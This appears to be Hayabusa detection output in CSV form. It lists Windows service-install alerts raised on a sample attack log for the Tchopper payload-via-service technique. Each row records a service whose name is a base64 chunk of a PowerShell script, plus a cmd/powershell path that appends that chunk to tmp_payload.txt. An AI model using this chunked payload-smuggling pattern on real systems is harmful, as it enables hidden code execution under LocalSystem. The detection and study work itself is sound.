2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:18:15.677 
